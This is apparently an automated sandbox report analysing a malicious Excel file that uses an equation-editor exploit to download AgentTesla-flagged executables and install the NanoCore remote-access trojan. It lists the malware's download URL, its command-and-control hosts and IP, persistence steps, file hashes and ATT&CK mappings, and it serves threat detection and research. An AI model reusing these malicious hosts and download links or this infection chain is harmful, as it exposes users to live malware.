      Source: RegSvcs.exe, 00000007.00000002.2370608864.0000000002528000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
      Source: RegSvcs.exe, 00000007.00000002.2370608864.0000000002528000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000007.00000002.2370298353.0000000000DD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegSvcs.exe, 00000007.00000003.2337829018.000000000032F000.00000004.00000001.sdmpBinary or memory string: Program Manager- PR0078966 - PR0078966svc.exe
      Source: RegSvcs.exe, 00000007.00000002.2370298353.0000000000DD0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: RegSvcs.exe, 00000007.00000002.2369796827.00000000002B8000.00000004.00000020.sdmpBinary or memory string: (G0Program Manager
      Source: RegSvcs.exe, 00000007.00000002.2370608864.0000000002528000.00000004.00000001.sdmpBinary or memory string: Program Manager<
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORY
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: RegSvcs.exe, 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORY
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0075256E bind,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0075253B bind,

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery14Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsScheduled Task/Job1Logon Script (Windows)Process Injection312Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Scheduled Task/Job1Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading112Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol222Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 385365 Sample: PR0078966.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 17 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 38 48 2->12         started        14 smtpsvc.exe 2 2->14         started        process3 dnsIp4 45 covid19vaccinations.hopto.org 13.235.115.155, 49167, 80 AMAZON-02US United States 7->45 35 C:\Users\user\AppData\Local\...\nass[1].exe, PE32 7->35 dropped 37 C:\Users\Public\vbc.exe, PE32 7->37 dropped 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->65 16 vbc.exe 5 7->16         started        39 C:\Users\user\Desktop\~$PR0078966.xlsx, data 12->39 dropped file5 signatures6 process7 file8 27 C:\Users\user\AppData\Roaming\blFUun.exe, PE32 16->27 dropped 29 C:\Users\user\AppData\Local\...\tmpE206.tmp, XML 16->29 dropped 47 Multi AV Scanner detection for dropped file 16->47 49 Machine Learning detection for dropped file 16->49 51 Uses schtasks.exe or at.exe to add and modify task schedules 16->51 53 3 other signatures 16->53 20 RegSvcs.exe 1 8 16->20         started        25 schtasks.exe 16->25         started        signatures9 process10 dnsIp11 41 79.134.225.30, 1144, 49168, 49169 FINK-TELECOM-SERVICESCH Switzerland 20->41 43 nassiru1155.ddns.net 20->43 31 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 20->31 dropped 33 C:\Program Files (x86)\...\smtpsvc.exe, PE32 20->33 dropped 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->63 file12 signatures13

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PR0078966.xlsx29%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exe100%Joe Sandbox ML
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\blFUun.exe100%Joe Sandbox ML
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\Users\user\AppData\Roaming\blFUun.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\Users\Public\vbc.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      7.2.RegSvcs.exe.d10000.4.unpack100%AviraTR/NanoCore.fadteDownload File
      7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      covid19vaccinations.hopto.org5%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      nassiru1155.ddns.net0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://covid19vaccinations.hopto.org/nass.exe2%VirustotalBrowse
      http://covid19vaccinations.hopto.org/nass.exe100%Avira URL Cloudmalware
      79.134.225.300%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      covid19vaccinations.hopto.org
      13.235.115.155
      truetrueunknown
      nassiru1155.ddns.net
      unknown
      unknowntrue
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        nassiru1155.ddns.nettrue
        • Avira URL Cloud: safe
        unknown
        http://covid19vaccinations.hopto.org/nass.exetrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        79.134.225.30true
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.%s.comPAvbc.exe, 00000004.00000002.2184312053.0000000005720000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371654641.0000000004D30000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2184312053.0000000005720000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371654641.0000000004D30000.00000002.00000001.sdmpfalse
          high
          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpfalse
            high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            13.235.115.155
            covid19vaccinations.hopto.orgUnited States
            16509AMAZON-02UStrue
            79.134.225.30
            unknownSwitzerland
            6775FINK-TELECOM-SERVICESCHtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:385365
            Start date:12.04.2021
            Start time:11:30:27
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 7m 52s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:PR0078966.xlsx
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winXLSX@9/34@40/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 1.1% (good quality ratio 0.7%)
            • Quality average: 45.2%
            • Quality standard deviation: 39.4%
            HCA Information:
            • Successful, ratio: 97%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
            • TCP Packets have been reduced to 100
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            11:31:09API Interceptor66x Sleep call for process: EQNEDT32.EXE modified
            11:31:13API Interceptor31x Sleep call for process: vbc.exe modified
            11:31:15API Interceptor1x Sleep call for process: schtasks.exe modified
            11:31:22API Interceptor1362x Sleep call for process: RegSvcs.exe modified
            11:31:24AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            13.235.115.155SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
            • covid19vaccinations.hopto.org/nano.exe
            79.134.225.30JQEl8bosea.exeGet hashmaliciousBrowse
              YfceI5MZX4.exeGet hashmaliciousBrowse
                SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                  TSskTqG9V9.exeGet hashmaliciousBrowse
                    Files Specification.xlsxGet hashmaliciousBrowse
                      J62DQ7fO0b.exeGet hashmaliciousBrowse
                        oE6O5K1emC.exeGet hashmaliciousBrowse
                          AIC7VMxudf.exeGet hashmaliciousBrowse
                            Payment Confirmation.exeGet hashmaliciousBrowse
                              JOIN.exeGet hashmaliciousBrowse
                                Itinerary.pdf.exeGet hashmaliciousBrowse
                                  vVH0wIFYFd.exeGet hashmaliciousBrowse
                                    GWee9QSphp.exeGet hashmaliciousBrowse
                                      s7pnYY2USl.jarGet hashmaliciousBrowse
                                        s7pnYY2USl.jarGet hashmaliciousBrowse
                                          SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exeGet hashmaliciousBrowse
                                            Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                              BBdzKOGQ36.exeGet hashmaliciousBrowse
                                                BL.exeGet hashmaliciousBrowse
                                                  Payment Invoice.exeGet hashmaliciousBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    covid19vaccinations.hopto.orgSOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                    • 13.235.115.155
                                                    Files Specification.xlsxGet hashmaliciousBrowse
                                                    • 34.220.10.254
                                                    APR 21SOA.xlsxGet hashmaliciousBrowse
                                                    • 144.168.163.101

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    FINK-TELECOM-SERVICESCHPO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                    • 79.134.225.21
                                                    JQEl8bosea.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    YfceI5MZX4.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    OjAJYVQ7iK.exeGet hashmaliciousBrowse
                                                    • 79.134.225.112
                                                    TSskTqG9V9.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    Files Specification.xlsxGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    J62DQ7fO0b.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    oE6O5K1emC.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    zunUbtZ2Y3.exeGet hashmaliciousBrowse
                                                    • 79.134.225.40
                                                    EASTERS.exeGet hashmaliciousBrowse
                                                    • 79.134.225.118
                                                    LIST OF POEA DELISTED AGENCIES.pdf.exeGet hashmaliciousBrowse
                                                    • 79.134.225.9
                                                    AWB.pdf.exeGet hashmaliciousBrowse
                                                    • 79.134.225.102
                                                    AIC7VMxudf.exeGet hashmaliciousBrowse
                                                    • 79.134.225.30
                                                    9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exeGet hashmaliciousBrowse
                                                    • 79.134.225.21
                                                    PO50164.exeGet hashmaliciousBrowse
                                                    • 79.134.225.79
                                                    Fast color scan to a PDFfile_1_20210331084231346.pdf.exeGet hashmaliciousBrowse
                                                    • 79.134.225.102
                                                    n7dIHuG3v6.exeGet hashmaliciousBrowse
                                                    • 79.134.225.92
                                                    F6JT4fXIAQ.exeGet hashmaliciousBrowse
                                                    • 79.134.225.92
                                                    order_inquiry2094.xls.exeGet hashmaliciousBrowse
                                                    • 79.134.225.102
                                                    AMAZON-02USpresupuesto.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                    • 52.15.160.167
                                                    s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                                    • 3.13.255.157
                                                    PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                                    • 18.184.197.212
                                                    PAYMENT COPY.exeGet hashmaliciousBrowse
                                                    • 52.79.124.173
                                                    g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                    • 44.227.76.166
                                                    sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                    • 18.184.197.212
                                                    SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                    • 13.235.115.155
                                                    remittance info.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                    • 108.128.238.226
                                                    Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                    • 18.184.197.212
                                                    Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    NEW ORDER.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                    • 52.59.165.42
                                                    winlog.exeGet hashmaliciousBrowse
                                                    • 3.14.206.30
                                                    J6wDHe2QdA.exeGet hashmaliciousBrowse
                                                    • 3.22.15.135
                                                    hsOBwEXSsq.exeGet hashmaliciousBrowse
                                                    • 3.142.167.54
                                                    1B4AF276CB3E0BFC9709174B8F75E13C4B224F4B35A6E.exeGet hashmaliciousBrowse
                                                    • 3.13.191.225

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Program Files (x86)\SMTP Service\smtpsvc.exeSOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                      69JCWICJ9872001.exeGet hashmaliciousBrowse
                                                        Proforma 0089 05 2019.xlsxGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):3.7499114035101173
                                                          Encrypted:false
                                                          SSDEEP:384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
                                                          MD5:72A9F09010A89860456C6474E2E6D25C
                                                          SHA1:E4CB506146F60D01EA9E6132020DEF61974A88C3
                                                          SHA-256:7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
                                                          SHA-512:BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx, Detection: malicious, Browse
                                                          • Filename: 69JCWICJ9872001.exe, Detection: malicious, Browse
                                                          • Filename: Proforma 0089 05 2019.xlsx, Detection: malicious, Browse
                                                          Reputation:low
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):792064
                                                          Entropy (8bit):7.348021891570888
                                                          Encrypted:false
                                                          SSDEEP:12288:I4enekLl7hRNLPXlf/BfykeiLmtlzwrbsybFVxXo7Ko7ICfLcA:QFNLPXLxjLm7KoOVxXBjCfLcA
                                                          MD5:6A647FD057FD6A0B85C644D928125EB4
                                                          SHA1:0876B0BD85B3FEA743370B8A7793102DD9328BBB
                                                          SHA-256:74E0F799A11A134C003BDFC626D453E74C92903D0640C8E1C801A78FE715A095
                                                          SHA-512:0800B5ED2A4A608EE58D8679439E62533F9316B9F908D34F48C24A8BB7E106664BCA89E32B2A0C4532B4C736977FA83D03D4EDA980D05C89A35426EC740F7DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 19%
                                                          Reputation:low
                                                          IE Cache URL:http://covid19vaccinations.hopto.org/nass.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......l......j.... ........@.. ....................................@.....................................O.......4i...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...4i.......j..................@..@.reloc.......`......................@..B................L.......H.......................x................................................0............(#...($.........(.....o%....*.....................(&......('......((......()......(*....*N..(....o....(+....*&..(,....*.s-........s.........s/........s0........s1........*....0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0..<........~.....(7.....,!r...p.....(8...o9...s:............~.....+..*.0......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10C739BF.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 768 x 560, 8-bit colormap, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):98310
                                                          Entropy (8bit):7.9703722926597
                                                          Encrypted:false
                                                          SSDEEP:1536:Zx21e23rYd3AaoeAVGm6JwgkxIbnHh+1ubK44GmWu/jeQl/4HYplS:DH2b6geAL6WgcITHh9u44wuieQYG
                                                          MD5:326233AB0E13BA251EA8A561C83E64C4
                                                          SHA1:11C7709F09142BB67F316262E42EDA81D73C4CCD
                                                          SHA-256:AC69908FB64F897EE358F4D76972E2F5B7BF8B4B6E38397BFF4134ACBEB7F0A6
                                                          SHA-512:BB7637332D8B6E8A268E24C19C84573B90885C81E50E021A2DF994451046FCDF537E96D1B8D26B8A7272489CD141784BCB799375D9C17EFD302202EC904032B7
                                                          Malicious:false
                                                          Reputation:low
